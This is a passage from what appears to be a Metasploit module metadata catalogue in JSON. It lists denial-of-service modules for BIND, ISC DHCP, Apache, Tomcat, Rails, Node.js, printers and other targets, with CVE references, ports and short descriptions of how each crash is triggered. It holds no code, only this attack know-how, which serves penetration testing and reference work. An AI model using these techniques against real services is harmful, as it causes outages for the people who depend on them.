"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb",
"is_install_path": true,
"ref_name": "dos/cisco/ios_telnet_rocem",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/dhcp/isc_dhcpd_clientid": {
"name": "ISC DHCP Zero Length ClientID Denial of Service Module",
"full_name": "auxiliary/dos/dhcp/isc_dhcpd_clientid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sid",
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module performs a Denial of Service Attack against the ISC DHCP server,\n versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request\n message with a 0-length client_id option for an IP address on the appropriate range\n for the dhcp server. When ISC DHCP Server tries to hash this value it exits\n abnormally.",
"references": [
"CVE-2010-2156",
"OSVDB-65246",
"EDB-14185"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb",
"is_install_path": true,
"ref_name": "dos/dhcp/isc_dhcpd_clientid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/dns/bind_tkey": {
"name": "BIND TKEY Query Denial of Service",
"full_name": "auxiliary/dos/dns/bind_tkey",
"rank": 300,
"disclosure_date": "2015-07-28",
"type": "auxiliary",
"author": [
"Jonathan Foote",
"throwawayokejxqbbif",
"wvu <wvu@metasploit.com>"
],
"description": "This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.",
"references": [
"CVE-2015-5477",
"URL-https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/",
"URL-https://kb.isc.org/article/AA-01272"
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/dos/dns/bind_tkey.rb",
"is_install_path": true,
"ref_name": "dos/dns/bind_tkey",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/dns/bind_tsig": {
"name": "BIND TKEY Query Denial of Service",
"full_name": "auxiliary/dos/dns/bind_tsig",
"rank": 300,
"disclosure_date": "2016-09-27",
"type": "auxiliary",
"author": [
"Martin Rocha",
"Ezequiel Tavella",
"Alejandro Parodi",
"Infobyte Research Team"
],
"description": "A defect in the rendering of messages into packets can cause named to\n exit with an assertion failure in buffer.c while constructing a response\n to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address\n isn't allowed to make queries.",
"references": [
"CVE-2016-2776",
"URL-http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html"
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 10:41:10 +0000",
"path": "/modules/auxiliary/dos/dns/bind_tsig.rb",
"is_install_path": true,
"ref_name": "dos/dns/bind_tsig",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/freebsd/nfsd/nfsd_mount": {
"name": "FreeBSD Remote NFS RPC Request Denial of Service",
"full_name": "auxiliary/dos/freebsd/nfsd/nfsd_mount",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module sends a specially-crafted NFS Mount request causing a\n kernel panic on host running FreeBSD 6.0.",
"references": [
"BID-16838",
"OSVDB-23511",
"CVE-2006-0900"
],
"platform": "",
"arch": "",
"rport": 2049,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb",
"is_install_path": true,
"ref_name": "dos/freebsd/nfsd/nfsd_mount",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/hp/data_protector_rds": {
"name": "HP Data Protector Manager RDS DOS",
"full_name": "auxiliary/dos/hp/data_protector_rds",
"rank": 300,
"disclosure_date": "2011-01-08",
"type": "auxiliary",
"author": [
"Roi Mallo <rmallof@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module causes a remote DOS on HP Data Protector's RDS service. By sending\n a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous\n size for malloc().",
"references": [
"CVE-2011-0514",
"OSVDB-70617",
"EDB-15940"
],
"platform": "",
"arch": "",
"rport": 1530,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/hp/data_protector_rds.rb",
"is_install_path": true,
"ref_name": "dos/hp/data_protector_rds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/3com_superstack_switch": {
"name": "3Com SuperStack Switch Denial of Service",
"full_name": "auxiliary/dos/http/3com_superstack_switch",
"rank": 300,
"disclosure_date": "2004-06-24",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module causes a temporary denial of service condition\n against 3Com SuperStack switches. By sending excessive data\n to the HTTP Management interface, the switch stops responding\n temporarily. The device does not reset. Tested successfully\n against a 3300SM firmware v2.66. Reported to affect versions\n prior to v2.72.",
"references": [
"OSVDB-7246",
"CVE-2004-2691",
"URL-http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/http/3com_superstack_switch.rb",
"is_install_path": true,
"ref_name": "dos/http/3com_superstack_switch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/apache_commons_fileupload_dos": {
"name": "Apache Commons FileUpload and Apache Tomcat DoS",
"full_name": "auxiliary/dos/http/apache_commons_fileupload_dos",
"rank": 300,
"disclosure_date": "2014-02-06",
"type": "auxiliary",
"author": [
"Unknown",
"ribeirux"
],
"description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.",
"references": [
"CVE-2014-0050",
"URL-http://tomcat.apache.org/security-8.html",
"URL-http://tomcat.apache.org/security-7.html"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_commons_fileupload_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/apache_mod_isapi": {
"name": "Apache mod_isapi Dangling Pointer",
"full_name": "auxiliary/dos/http/apache_mod_isapi",
"rank": 300,
"disclosure_date": "2010-03-05",
"type": "auxiliary",
"author": [
"Brett Gervasoni",
"jduck <jduck@metasploit.com>"
],
"description": "This module triggers a use-after-free vulnerability in the Apache\n Software Foundation mod_isapi extension for versions 2.2.14 and earlier.\n In order to reach the vulnerable code, the target server must have an\n ISAPI module installed and configured.\n\n By making a request that terminates abnormally (either an aborted TCP\n connection or an unsatisfied chunked request), mod_isapi will unload the\n ISAPI extension. Later, if another request comes for that ISAPI module,\n previously obtained pointers will be used resulting in an access\n violation or potentially arbitrary code execution.\n\n Although arbitrary code execution is theoretically possible, a\n real-world method of invoking this consequence has not been proven. In\n order to do so, one would need to find a situation where a particular\n ISAPI module loads at an image base address that can be re-allocated by\n a remote attacker.\n\n Limited success was encountered using two separate ISAPI modules. In\n this scenario, a second ISAPI module was loaded into the same memory\n area as the previously unloaded module.",
"references": [
"CVE-2010-0425",
"OSVDB-62674",
"BID-38494",
"URL-https://issues.apache.org/bugzilla/show_bug.cgi?id=48509",
"URL-http://www.gossamer-threads.com/lists/apache/cvs/381537",
"URL-http://www.senseofsecurity.com.au/advisories/SOS-10-002",
"EDB-11650"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/apache_mod_isapi.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_mod_isapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/apache_range_dos": {
"name": "Apache Range Header DoS (Apache Killer)",
"full_name": "auxiliary/dos/http/apache_range_dos",
"rank": 300,
"disclosure_date": "2011-08-19",
"type": "auxiliary",
"author": [
"Kingcope",
"Masashi Fujiwara",
"Markus Neis <markus.neis@gmail.com>"
],
"description": "The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x\n through 2.2.19 allows remote attackers to cause a denial of service (memory and\n CPU consumption) via a Range header that expresses multiple overlapping ranges,\n exploit called \"Apache Killer\"",
"references": [
"BID-49303",
"CVE-2011-3192",
"EDB-17696",
"OSVDB-74721"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-04-25 23:08:19 +0000",
"path": "/modules/auxiliary/dos/http/apache_range_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_range_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/apache_tomcat_transfer_encoding": {
"name": "Apache Tomcat Transfer-Encoding Information Disclosure and DoS",
"full_name": "auxiliary/dos/http/apache_tomcat_transfer_encoding",
"rank": 300,
"disclosure_date": "2010-07-09",
"type": "auxiliary",
"author": [
"Steve Jones",
"Hoagie <andi@void.at>",
"Paulino Calderon <calderon@websec.mx>"
],
"description": "Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not\n properly handle an invalid Transfer-Encoding header, which allows remote attackers\n to cause a denial of service (application outage) or obtain sensitive information\n via a crafted header that interferes with \"recycling of a buffer.\"",
"references": [
"CVE-2010-2227",
"OSVDB-66319",
"BID-41544"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_tomcat_transfer_encoding",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/brother_debut_dos": {
"name": "Brother Debut http Denial Of Service",
"full_name": "auxiliary/dos/http/brother_debut_dos",
"rank": 300,
"disclosure_date": "2017-11-02",
"type": "auxiliary",
"author": [
"z00n <0xz00n@gmail.com>",
"h00die"
],
"description": "The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial\n of Service (DoS) condition via a crafted HTTP request. The printer will be\n unresponsive from HTTP and printing requests for ~300 seconds. After which, the\n printer will start responding again.",
"references": [
"CVE-2017-16249",
"URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-017/?fid=10211"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-01-24 20:54:21 +0000",
"path": "/modules/auxiliary/dos/http/brother_debut_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/brother_debut_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/canon_wireless_printer": {
"name": "Canon Wireless Printer Denial Of Service",
"full_name": "auxiliary/dos/http/canon_wireless_printer",
"rank": 300,
"disclosure_date": "2013-06-18",
"type": "auxiliary",
"author": [
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "The HTTP management interface on several models of Canon Wireless printers\n allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:\n if this module is successful, the device can only be recovered with a physical\n power cycle.",
"references": [
"CVE-2013-4615",
"URL-http://www.mattandreko.com/2013/06/canon-y-u-no-security.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/canon_wireless_printer.rb",
"is_install_path": true,
"ref_name": "dos/http/canon_wireless_printer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/dell_openmanage_post": {
"name": "Dell OpenManage POST Request Heap Overflow (win32)",
"full_name": "auxiliary/dos/http/dell_openmanage_post",
"rank": 300,
"disclosure_date": "2004-02-26",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a heap overflow in the Dell OpenManage\n Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability\n exists due to a boundary error within the handling of POST requests,\n where the application input is set to an overly long file name.\n This module will crash the web server, however it is likely exploitable\n under certain conditions.",
"references": [
"URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html",
"BID-9750",
"OSVDB-4077",
"CVE-2004-0331"
],
"platform": "",
"arch": "",
"rport": 1311,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/http/dell_openmanage_post.rb",
"is_install_path": true,
"ref_name": "dos/http/dell_openmanage_post",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/f5_bigip_apm_max_sessions": {
"name": "F5 BigIP Access Policy Manager Session Exhaustion Denial of Service",
"full_name": "auxiliary/dos/http/f5_bigip_apm_max_sessions",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Denis Kolegov <dnkolegov@gmail.com>",
"Oleg Broslavsky <ovbroslavsky@gmail.com>",
"Nikita Oleksov <neoleksov@gmail.com>"
],
"description": "This module exploits a resource exhaustion denial of service in F5 BigIP devices. An\n unauthenticated attacker can establish multiple connections with BigIP Access Policy\n Manager (APM) and exhaust all available sessions defined in customer license. In the\n first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP\n system creates a session, marks it as pending and then redirects the client to an access\n policy URI. Since BigIP allocates a new session after the first unauthenticated request,\n and deletes the session only if an access policy timeout expires, the attacker can exhaust\n all available sessions by repeatedly sending the initial HTTP request and leaving the\n sessions as pending.",
"references": [
"URL-https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb",
"is_install_path": true,
"ref_name": "dos/http/f5_bigip_apm_max_sessions",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/flexense_http_server_dos": {
"name": "Flexense HTTP Server Denial Of Service",
"full_name": "auxiliary/dos/http/flexense_http_server_dos",
"rank": 300,
"disclosure_date": "2018-03-09",
"type": "auxiliary",
"author": [
"Ege Balci <ege.balci@invictuseurope.com>"
],
"description": "This module triggers a Denial of Service vulnerability in the Flexense HTTP server.\n Vulnerability caused by a user mode write access memory violation and can be triggered with\n rapidly sending variety of HTTP requests with long HTTP header values.\n\n Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.",
"references": [
"CVE-2018-8065",
"URL-https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-05-29 16:09:27 +0000",
"path": "/modules/auxiliary/dos/http/flexense_http_server_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/flexense_http_server_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/gzip_bomb_dos": {
"name": "Gzip Memory Bomb Denial Of Service",
"full_name": "auxiliary/dos/http/gzip_bomb_dos",
"rank": 300,
"disclosure_date": "2004-01-01",
"type": "auxiliary",
"author": [
"info <info@aerasec.de>",
"joev <joev@metasploit.com>"
],
"description": "This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.\n Many applications will not implement a length limit check and will eat up all memory and\n eventually die. This can also be used to kill systems that download/parse content from\n a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).\n\n A FILEPATH datastore option can also be provided to save the .gz bomb locally.\n\n Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly\n deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)\n will generate a 300 byte gzipped file that expands to 10GB.",
"references": [
"URL-http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/gzip_bomb_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/gzip_bomb_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/hashcollision_dos": {
"name": "Hashtable Collisions",
"full_name": "auxiliary/dos/http/hashcollision_dos",
"rank": 300,
"disclosure_date": "2011-12-28",
"type": "auxiliary",
"author": [
"Alexander Klink",
"Julian Waelde",
"Scott A. Crosby",
"Dan S. Wallach",
"Krzysztof Kotowicz",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module uses a denial-of-service (DoS) condition appearing in a variety of\n programming languages. This vulnerability occurs when storing multiple values\n in a hash table and all values have the same hash value. This can cause a web server\n parsing the POST parameters issued with a request into a hash table to consume\n hours of CPU with a single HTTP request.\n\n Currently, only the hash functions for PHP and Java are implemented.\n This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.\n It also generates a random payload to bypass some IDS signatures.",
"references": [
"URL-http://www.ocert.org/advisories/ocert-2011-003.html",
"URL-http://www.nruns.com/_downloads/advisory28122011.pdf",
"URL-http://events.ccc.de/congress/2011/Fahrplan/events/4680.en.html",
"URL-http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf",
"URL-http://www.youtube.com/watch?v=R2Cq3CLI6H8",
"CVE-2011-5034",
"CVE-2011-5035",
"CVE-2011-4885",
"CVE-2011-4858"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/hashcollision_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/hashcollision_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/ibm_lotus_notes": {
"name": "IBM Notes encodeURI DOS",
"full_name": "auxiliary/dos/http/ibm_lotus_notes",
"rank": 300,
"disclosure_date": "2017-08-31",
"type": "auxiliary",
"author": [
"Dhiraj Mishra"
],
"description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, it could cause the Notes client to hang and have to be restarted.",
"references": [
"EXPLOIT-DB-42602",
"CVE-2017-1129",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21999385"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-09 17:02:24 +0000",
"path": "/modules/auxiliary/dos/http/ibm_lotus_notes.rb",
"is_install_path": true,
"ref_name": "dos/http/ibm_lotus_notes",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/ibm_lotus_notes2": {
"name": "IBM Notes Denial Of Service",
"full_name": "auxiliary/dos/http/ibm_lotus_notes2",
"rank": 300,
"disclosure_date": "2017-08-31",
"type": "auxiliary",
"author": [
"Dhiraj Mishra"
],
"description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, the browser will crash after viewing the webpage.",
"references": [
"EDB-42604",
"CVE-2017-1130"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-06 20:45:50 +0000",
"path": "/modules/auxiliary/dos/http/ibm_lotus_notes2.rb",
"is_install_path": true,
"ref_name": "dos/http/ibm_lotus_notes2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/marked_redos": {
"name": "marked npm module \"heading\" ReDoS",
"full_name": "auxiliary/dos/http/marked_redos",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Adam Cazzolla, Sonatype Security Research",
"Nick Starke, Sonatype Security Research"
],
"description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"marked\". The vulnerable portion of code that this module\n targets is in the \"heading\" regular expression. Web applications that use\n \"marked\" for generating html from markdown are vulnerable. Versions up to\n 0.4.0 are vulnerable.",
"references": [
"URL-https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not",
"CWE-400"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-16 14:59:32 +0000",
"path": "/modules/auxiliary/dos/http/marked_redos.rb",
"is_install_path": true,
"ref_name": "dos/http/marked_redos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/monkey_headers": {
"name": "Monkey HTTPD Header Parsing Denial of Service (DoS)",
"full_name": "auxiliary/dos/http/monkey_headers",
"rank": 300,
"disclosure_date": "2013-05-30",
"type": "auxiliary",
"author": [
"Doug Prostko <dougtko@gmail.com>"
],
"description": "This module causes improper header parsing that leads to a segmentation fault\n due to a specially crafted HTTP request. Affects version <= 1.2.0.",
"references": [
"CVE-2013-3843",
"OSVDB-93853",
"BID-60333"
],
"platform": "",
"arch": "",
"rport": 2001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/monkey_headers.rb",
"is_install_path": true,
"ref_name": "dos/http/monkey_headers",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/ms15_034_ulonglongadd": {
"name": "MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service",
"full_name": "auxiliary/dos/http/ms15_034_ulonglongadd",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Bill Finlayson",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a\n vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code\n execution. This module will try to cause a denial-of-service.",
"references": [
"CVE-2015-1635",
"MSB-MS15-034",
"URL-http://pastebin.com/ypURDPc4",
"URL-https://github.com/rapid7/metasploit-framework/pull/5150",
"URL-https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection",
"URL-http://www.securitysift.com/an-analysis-of-ms15-034/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb",
"is_install_path": true,
"ref_name": "dos/http/ms15_034_ulonglongadd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/nodejs_pipelining": {
"name": "Node.js HTTP Pipelining Denial of Service",
"full_name": "auxiliary/dos/http/nodejs_pipelining",
"rank": 300,
"disclosure_date": "2013-10-18",
"type": "auxiliary",
"author": [
"Marek Majkowski",
"titanous",
"joev <joev@metasploit.com>"
],
"description": "This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions\n released before 0.10.21 and 0.8.26. The attack sends many pipelined\n HTTP requests on a single connection, which causes unbounded memory\n allocation when the client does not read the responses.",
"references": [
"CVE-2013-4450",
"OSVDB-98724",
"BID-63229",
"URL-http://blog.nodejs.org/2013/10/22/cve-2013-4450-http-server-pipeline-flood-dos"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/nodejs_pipelining.rb",
"is_install_path": true,
"ref_name": "dos/http/nodejs_pipelining",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/novell_file_reporter_heap_bof": {
"name": "NFR Agent Heap Overflow Vulnerability",
"full_name": "auxiliary/dos/http/novell_file_reporter_heap_bof",
"rank": 300,
"disclosure_date": "2012-11-16",
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n File Reporter (NFR). The vulnerability occurs when handling requests of name \"SRS\",\n where NFRAgent.exe fails to generate a response in a secure way, copying user\n controlled data into a fixed-length buffer in the heap without bounds checking.\n This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).",
"references": [
"CVE-2012-4956",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
],
"platform": "",
"arch": "",
"rport": 3037,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb",
"is_install_path": true,
"ref_name": "dos/http/novell_file_reporter_heap_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/rails_action_view": {
"name": "Ruby on Rails Action View MIME Memory Exhaustion",
"full_name": "auxiliary/dos/http/rails_action_view",
"rank": 300,
"disclosure_date": "2013-12-04",
"type": "auxiliary",
"author": [
"Toby Hsieh",
"joev <joev@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a Denial of Service (DoS) condition in Action View that requires\n a controller action. By sending a specially crafted content-type header to a Rails\n application, it is possible for it to store the invalid MIME type, and may eventually\n consume all memory if enough invalid MIMEs are given.\n\n Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.",
"references": [
"CVE-2013-6414",
"OSVDB-100525",
"BID-64074",
"URL-https://seclists.org/oss-sec/2013/q4/400",
"URL-https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/dos/http/rails_action_view.rb",
"is_install_path": true,
"ref_name": "dos/http/rails_action_view",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/rails_json_float_dos": {
"name": "Ruby on Rails JSON Processor Floating Point Heap Overflow DoS",
"full_name": "auxiliary/dos/http/rails_json_float_dos",
"rank": 300,
"disclosure_date": "2013-11-22",
"type": "auxiliary",
"author": [
"Charlie Somerville",
"joev <joev@metasploit.com>",
"todb <todb@metasploit.com>"
],
"description": "When Ruby attempts to convert a string representation of a large floating point\n decimal number to its floating point equivalent, a heap-based buffer overflow\n can be triggered. This module has been tested successfully on a Ruby on Rails application\n using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application\n crashes with a segfault error. Other versions of Ruby are reported to be affected.",
"references": [
"CVE-2013-4164",
"OSVDB-100113",
"URL-https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/rails_json_float_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/rails_json_float_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/slowloris": {
"name": "Slowloris Denial of Service Attack",
"full_name": "auxiliary/dos/http/slowloris",
"rank": 300,
"disclosure_date": "2009-06-17",
"type": "auxiliary",
"author": [
"RSnake",
"Gokberk Yaltirakli",
"Daniel Teixeira",
